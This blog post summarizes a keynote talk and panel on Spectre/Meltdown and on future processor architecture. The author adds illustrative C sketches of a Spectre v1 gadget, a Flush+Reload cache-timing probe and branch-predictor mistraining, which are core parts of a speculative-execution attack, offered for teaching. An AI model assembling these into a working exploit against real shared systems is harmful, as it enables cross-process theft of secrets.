I gave an introduction to speculative execution and the vulnerabilities that have come to light this year in my post Spectre/Meltdown & What It Means for Future Design 1. Yesterday, I covered the first half of the keynote (John Hennessy, Paul Turner, and Jon Masters) in Spectre/Meltdown & What It Means for Future Design 2. Today, I wrap up with Mark Hill and the panel discussion that followed.

Mark Hill: Exploiting Modern μArchitectures: Hardware Implications

Last of the panelists was Mark Hill. He started with a bit of history:

- Architecture 0.0 (pre-1964): each computer implementation was new, requiring all software to be rewritten (typically in assembly language).
- Architecture 1.0 (1964 on): the timing-independent functional behavior of a computer was captured in an ISA, which could be implemented by more than one design, such as the pioneering IBM System/360 series and all microprocessors today.
- Architecture 2.0: what we need next.

The flaws in implementation that Spectre and Meltdown have revealed are not bugs, in the sense that all the affected processors faithfully implement their ISAs correctly. The flaw is in the 50-year-old timing-independent definition of Architecture 1.0. Since leaking protected information can't really be "correct", we need to do two things. First, manage micro-architectural problems the way we manage crime: not eliminating them completely, which would be too expensive, but keeping them under control. Second, define Architecture 2.0 and change the way we do things.

Some things to consider at the micro-architectural level:

- Isolate branch predictors, BTBs, and TLBs per process, and context-switch them. Weird as it seems, branch predictors are currently shared between all processes. That means a predictor sometimes guesses wrong because of what a different process did, which is a trivial problem, but it also means one process can train the branch predictor to affect another, which has turned out to be bad (a sketch of the kind of gadget this enables appears after this list).
- Partition caches among trusted processes (and flush on context switch?).
- Reduce aliasing, for example with fully-associative caches (use all the bits).
- Hardware protection within a single user address space, such as one browser tab treating another as an enemy.
- Undo some speculation where it has minimal performance impact.
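To make the branch-predictor point concrete, here is a minimal sketch (mine, not from the talk) of the kind of bounds-check-bypass gadget that Spectre variant 1 relies on. The array names, sizes, and page-sized stride are illustrative assumptions; the point is that the bounds check is architecturally correct, yet a mistrained predictor lets the secret-dependent load run speculatively and leave a footprint in the cache.

```c
/* Sketch of a Spectre v1 (bounds-check bypass) victim gadget.
 * All names and sizes are illustrative, not from the talk.
 * Compile with optimizations off so the pattern survives, e.g.:
 *   gcc -O0 -o gadget gadget.c
 */
#include <stddef.h>
#include <stdint.h>

#define ARRAY1_SIZE 16

uint8_t array1[ARRAY1_SIZE];     /* attacker-reachable data             */
uint8_t array2[256 * 4096];      /* probe array: one page per byte value */

/* The bounds check is architecturally correct; the leak happens only
 * speculatively, while the branch predictor assumes "in bounds".      */
void victim(size_t x)
{
    if (x < ARRAY1_SIZE) {
        /* Speculatively executed even when x is out of bounds:
         * array1[x] reads a byte it shouldn't, and the dependent load
         * pulls a secret-indexed line of array2 into the cache.        */
        volatile uint8_t tmp = array2[array1[x] * 4096];
        (void)tmp;
    }
}

int main(void)
{
    victim(0);   /* an ordinary, in-bounds call */
    return 0;
}
```

Recovering the secret then requires timing which line of array2 became cached; a sketch of that readout step appears later in this post.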
Is there a "happy knee" where we get good performance and good safety? Mark fears that there is not. There is a potential to bifurcate, and have cores (or modes) that are fast(er) or safe(r), where some speculation is disabled. This is an extension of what is already being done for security, where hardware "enclaves" hold the keys, and perhaps the encryption algorithm implementation. It also plays well with dark silicon, where there is no point in just adding more and more identical cores if we can't turn them all on at once. But, as Mark pointed out, this is all very esoteric: "I'd just be happy if I could stop my Dad executing downloaded code!"

Mark's big point is that we need Architecture 2.0, since Architecture 1.0 is now known to be inadequate to protect information. We need to augment Architecture 1.0 with:

- An abstraction of time-visible micro-architecture.
- The bandwidth of known timing channels.
- Enforced limits on user software behavior.

But he admits that none of this seems good enough yet.

Another fact of life is the growing use of specialized accelerators such as GPUs, DSPs, neural-net processors, and FPGAs. This can actually reduce the need for speculation, since the "main" processor is increasingly just doing housekeeping rather than running the CPU-intensive algorithms. However, accelerators have timing channels that may be exploitable too, and nobody seems to have looked too hard yet.

Security experts disdain "security by obscurity" in favor of many eyeballs on the code; only the keys are kept secret. Open source software helps, but even lots of eyeballs on a bad implementation don't stop it being bad. Open source hardware is only really getting started, with RISC-V being the most well-known open-source hardware-like thing (it is an ISA, not a hardware implementation, so Architecture 1.0). But as John Hennessy's co-Turing-award honoree, Dave Patterson, said: most future hardware security ideas will be tried with RISC-V first.

Discussion

(Note: John is John Hennessy, Jon is Jon Masters.)

Question: Who should bear the cost? Today, Intel, Red Hat, and Google are paying.

John: Welcome to an industry where the warranty says nothing is guaranteed to work. We have to change how the industry works. As a community, we have opted for functionality over other properties that might be more important. Bill Gates complained to me, back in the days when Word still had some competition, that people would make checklists and buy the product with the most checks, not the one that worked best. With a processor, the first checkbox is how fast it is, not how secure it is. Until a year ago, nobody would have said that they would trade performance for more security. To be fair, we never asked that question until now.

Mark: We are talking about how to get hardware and software to work in concert, and that will take the next 24 months.

Jon: I'm worried about fatigue. If we get ten of these per week, we will need to decide which ones to fix, and people will get burned out.

John: This is important, but users accept much greater security issues. People don't create long passwords, different on every system, and change them every month.

Mark: Open source hardware is not a full solution. It is a way to try out security ideas and get more eyeballs on them.

Paul: There is so much value-add in the fabrication that it is always going to be secret sauce; it is worth too much money. But it is important to have a spec, and the specs today don't address any of this.

John: It is good to have an open implementation. In theory you could have an open implementation of an existing ISA, but I don't see that happening, for obvious reasons. But with RISC-V people can try things out. You can have a class and get people to implement Meltdown as a teaching tool.

Paul: We need greater isolation, but it's a heavy hammer. We need a way to map abstractions at the high level down to abstractions at the low level. Mark the code that is inside the sandbox separately from the code running the sandbox.

Question: Better late than never for the era of security. An ISA 2.0 first principle could be simple: no access without authorization. It is a challenge for us educators to look at non-quantitative aspects like security.

John: For sure we need to do a better job, but this is not easy. I'm sure a number of you have worked on cache-coherence protocols, and that is really hard. Now think about verifying that you never leak information from a hardware structure. It will require a new set of tools.

Mark: I applaud the idea of a simple principle, but that is just what the original architects thought they were doing.

John: Don't dwell too much on caches as side-channels. There are tons of others.
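Caches are nevertheless the channel that the published Spectre and Meltdown proofs-of-concept actually read out, so it is worth seeing how small that readout step is. The sketch below is a minimal Flush+Reload-style timing probe; it is my own illustration rather than anything shown in the session, it is x86-specific, and the fast-versus-slow threshold it would need in practice is machine-dependent.

```c
/* Minimal Flush+Reload-style probe: time a load to decide whether a
 * cache line is resident. x86-only; real attacks add serializing fences
 * and calibrate a hit/miss threshold per machine.
 * Compile e.g.: gcc -O2 -o probe probe.c
 */
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

static uint8_t probe_line[4096] __attribute__((aligned(4096)));

/* Return the access latency of one cache line, in TSC ticks. */
static uint64_t time_access(volatile uint8_t *addr)
{
    unsigned int aux;
    uint64_t start = __rdtscp(&aux);
    (void)*addr;                       /* the timed load */
    uint64_t end = __rdtscp(&aux);
    return end - start;
}

int main(void)
{
    _mm_clflush(probe_line);           /* evict the line from the cache */
    _mm_mfence();
    uint64_t flushed = time_access(probe_line);   /* slow: memory access */

    /* The timed load above brought the line back in, so a second
     * measurement sees a cache hit.                                  */
    uint64_t cached = time_access(probe_line);    /* fast: cache hit */

    printf("flushed: %llu ticks, cached: %llu ticks\n",
           (unsigned long long)flushed, (unsigned long long)cached);
    return 0;
}
```

A real attack flushes every line of a probe array, lets the victim's speculative load run (as in the earlier gadget sketch), and then times each line to see which one came back "hot".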
Question: You guys talked about public clouds. What about paying extra for exclusivity?

Paul: Browsers, cloud providers, and operating systems are going to have to find better ways to create more separation.

John: The tree has fallen in the forest and anyone can read it. Isn't the problem that we are not controlling who can reference the information?

Jon: The problem is that modern computers share a lot of stuff: the cache, the branch predictors, and so on. These are shared across boundaries.

Paul: As the user, I can control how branches are taken by training the predictor, but it is impossible for the hardware to know it was tricked. All it knows is that it went down a bad branch.
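Paul's point is easy to see in code. The fragment below is my own illustrative sketch, not something shown on the panel: it demonstrates the train-then-trigger calling pattern, where the final out-of-bounds call looks, to the branch predictor, exactly like the benign calls that preceded it. On its own it leaks nothing; it only shows why the hardware cannot tell it was tricked.

```c
/* Sketch of the "train, then trigger" pattern: the attacker biases the
 * branch predictor purely by choosing inputs. All names and constants
 * are illustrative. Compile with -O0 to keep the branch structure.
 */
#include <stddef.h>
#include <stdint.h>

#define LIMIT 16
static uint8_t table[LIMIT];

static int checked_read(size_t i)
{
    if (i < LIMIT)            /* the branch being trained                   */
        return table[i];      /* speculated past the check when mistrained  */
    return -1;
}

int main(void)
{
    volatile int sink = 0;             /* keep the calls from being dropped */
    size_t out_of_bounds = 1000;       /* illustrative "interesting" offset */

    for (int round = 0; round < 100; round++) {
        /* Training phase: many in-bounds calls teach the predictor
         * that the bounds check almost always passes.                */
        for (size_t i = 0; i < LIMIT; i++)
            sink += checked_read(i);

        /* Trigger: one out-of-bounds call. Architecturally it returns -1,
         * but the predictor still guesses "in bounds" and speculates.    */
        sink += checked_read(out_of_bounds);
    }
    (void)sink;
    return 0;
}
```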
Question: What about accelerators? Today this has all been about the CPU.

John: Currently accelerators are single-user mode and we clear all the state, so that reduces the attack surface and the rate at which you can suck data out. But if these become more pervasive, we'll have to work out how to make them shared, and we'll be back to the problem of having boundaries.

Jon: We don't want to build Spectre accelerators, using FPGAs in the cloud to leak more data faster!

Paul: The northbridge is no longer a separate chip, so more and more comes under the title of "the CPU".

John: Randomizing page placement, and randomizing lots of other stuff, will reduce the bandwidth, but not to zero. But it's like crime: a temporary fix for now, not really managing the problem.

On that happy note, the session wrapped up.

Sign up for Sunday Brunch, the weekly Breakfast Bytes email.